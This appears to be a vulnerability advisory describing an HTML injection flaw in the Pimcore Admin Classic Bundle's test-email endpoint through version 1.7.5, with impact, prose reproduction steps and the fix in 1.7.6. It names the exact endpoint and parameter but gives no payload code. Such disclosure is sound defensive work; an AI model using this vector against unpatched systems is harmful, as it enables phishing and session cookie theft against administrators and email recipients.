Pimcore Admin Classic Bundle HTML Injection Vulnerability in Email Sending Functionality

A vulnerability allowing HTML injection has been identified in the Pimcore Admin Classic Bundle, specifically in versions through 1.7.5. This issue arises in the email sending functionality within the Backend UI, where users can inject arbitrary HTML into emails. The vulnerability was found in the '/admin/email/send-test-email' endpoint, using the POST method. The 'content' parameter is the vector for injection, allowing users to embed HTML during the email dispatch process. Although JavaScript injection is filtered out, HTML injection remains feasible. This flaw could lead to session cookie theft and unauthorized alterations of page content.

Impact

Exploitation of this vulnerability could facilitate phishing attacks by allowing the injection of deceptive HTML, such as fake login forms, into emails sent through the admin interface.

Reproduction

To reproduce this vulnerability, a user must access the email sending feature in the Pimcore Admin Classic Bundle. When composing an email, the user can inject HTML payloads into the content form. Once the email is sent, the injected HTML will be executed, potentially leading to session cookie theft or manipulation of the email's content.

Remediation

Users can update to Pimcore Admin Classic Bundle version 1.7.6, where this vulnerability has been fixed.